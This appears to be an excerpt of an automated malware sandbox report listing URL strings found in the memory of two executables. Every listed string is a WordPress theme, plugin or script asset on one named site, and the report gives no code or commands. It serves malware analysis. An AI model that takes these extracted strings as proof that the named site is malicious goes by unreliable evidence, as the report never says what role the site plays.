                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/pojo-accessibility/assets/js/app.min.js?ver=1.0.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/css/flipbook.style.css?ver=3.25
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/css/font-awesome.css?ver=3.25
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/embed.js?ver=3.25
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.book3.min.js?ver=3.25
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.min.js?ver=3.25
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.25
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.swipe.min.js?ver=3.25
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.webgl.min.js?ver=3.25
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/iscroll.min.js?ver=3.25
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/pdf.min.js?ver=3.25
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/three.min.js?ver=3.25
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/tfc-product-catalog/tfc-product-catalog.js?ver=1.0.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/antiscroll/css.css?ver=2.1.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/antiscroll/js.js?ver=2.1.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/freeze_table/css.css?ver=2.1.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/freeze_table/js.js?ver=2.1.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/js.min.js?ver=2.1.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/multirange/css.css?ver=2.1.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/multirange/js.js?ver=2.1.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=7.8.2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=7.8.2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ve
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendo
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-elementor/style.min.css?ver=2.8.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-elementor/theme.min.css?ver=2.8.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-theme-child/style.css?ver=1.0.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-158.css?ver=1687814006
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-330.css?ver=1687814005
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-410.css?ver=1687814006
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-501.css?ver=1687814006
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/i18n.min.js?ver=9e794f35a71bb98672ae
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.11
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/imagesloaded.min.js?ver=4.1.4
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.4
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.17
